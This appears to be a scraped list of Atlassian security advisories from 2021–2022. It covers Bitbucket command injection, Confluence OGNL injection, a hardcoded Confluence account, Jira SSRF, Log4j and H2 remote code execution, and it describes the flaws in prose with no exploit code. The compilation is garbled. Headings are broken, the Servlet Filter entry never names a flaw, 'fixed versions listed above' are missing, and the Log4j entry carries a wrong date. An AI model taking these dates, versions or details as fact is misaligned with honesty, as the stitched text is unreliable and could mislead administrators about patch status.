Atlassian Security Updates (CVE)
August 2022
Critical severity command injection vulnerability and was released at, 24 Aug 2022
Information
This advisory discloses a critical severity security vulnerability which was introduced in version 7.0.0 of Bitbucket Server and Data Center. All versions released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability.
There is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.
Affected products
July 2022
This vulnerability should be remediated on affected systems immediately and was released at, 20 Jul 2022 and has already been updated
Information
A Servlet Filter is Java code that intercepts and processes HTTP requests before a client request is sent to a back end resource. They’re also used to intercept and process HTTP responses from a back end resource before they’re sent to a client. Some Servlet Filters provide security mechanisms such as logging, auditing, authentication, or authorization.
Affected products
- Bamboo Server and Data Center
- Bitbucket Server and Data Center
- Confluence Server and Data Center
- Crowd Server and Data Center
- Fisheye and Crucible
- Jira Server and Data Center
- Jira Service Management Server and Data Center
This vulnerability should be remediated on affected systems immediately and was released at, 20 Jul 2022 and has already been updated
Information
When the Questions for Confluence app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username disabledsystemuser. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The disabledsystemuser account is created with a hardcoded password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.
Affected products
Questions For Confluence app for:
- Confluence Server
- Confluence Data Center
June 2022
This advisory discloses a high severity security vulnerability was released at, June 29, 2022 and has already been updated
Information
A full-read server-side request forgery exists in Mobile Plugin for Jira, which is bundled with Jira and Jira Service Management. It is exploitable by any authenticated user (including a user who joined via the sign-up feature). It specifically affects the batch HTTP endpoint used in Mobile Plugin for Jira. It is possible to control the HTTP method and location of the intended URL through the method parameter in the body of the vulnerable endpoint.
Affected products
- Jira Core Server
- Jira Software Server
- Jira Software Data Center
- Jira Service Management Server
- Jira Service Management Data Center
A new ‘Critical’ vulnerability was released at, June 2, 2022 and has already been updated.
Information
Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
Affected products
All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.
A new ‘High’ vulnerability was released at, November 1, 2021.
Information
Multiple Atlassian products use the third-party Log4j library, which is vulnerable to CVE-2021-44228:
Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
Affected products
Bitbucket
November 2021
A new ‘High’ vulnerability was released at, November 1, 2021.
Severity
Atlassian rates the severity level of this vulnerability as high, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
Bamboo Server and Data Center
Bitbucket Server and Data Center
Confluence Server and Data Center
Crucible
Fisheye
Jira Service Management Server and Data Center (and Insight Asset Management app)
Jira Software Server and Data Center (including Jira Core)
Jira and Confluence Server mobile apps
Description
A vulnerability has been identified affecting multiple Atlassian products where special characters, known as Unicode bidirectional override characters, are not rendered or displayed in the affected applications. These special characters are typically not displayed by the browser or code editors but can affect the meaning of the source code when it is processed by a compiler or an interpreter.
Acknowledgements
The issue was identified and reported by Nicholas Boucher and Ross Anderson of the University of Cambridge.
October 2021
A new ‘Critical’ vulnerability was released at, 20th Oct 2021.
Severity
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate, or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
Insight – Asset Management app
Jira Service Management Data Center and Server
Description
Insight – Asset Management has a feature to import data from several databases (DBs). One of these DBs, the H2 DB, has a native function in its library which an attacker can use to run code on the server (remote code execution a.k.a. RCE). The H2 DB is bundled with Jira to help speed up the setup of Jira test environments.
The combination of the DB import feature introduced by Insight – Asset Management with the existing Jira H2 DB library exposed this vulnerability. The vulnerability exists whether or not the import configuration was saved and even if H2 was never used as a targeted DB. Accessing this vulnerability requires the following:
The user must be an authenticated Jira user AND
Either of the following privileges within Insight – Asset Management:
- user or group permission to “Insight administrator”
- user or group permission to “Object Schema Manager”
August 2021
A new ‘Critical’ vulnerability was released at, 25th August 2021.
Severity
This vulnerability is being actively exploited in the wild.
Affected servers should be patched immediately.
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
Confluence Server
Confluence Data Center
Description
An OGNL injection vulnerability exists that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.
Acknowledgements
The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.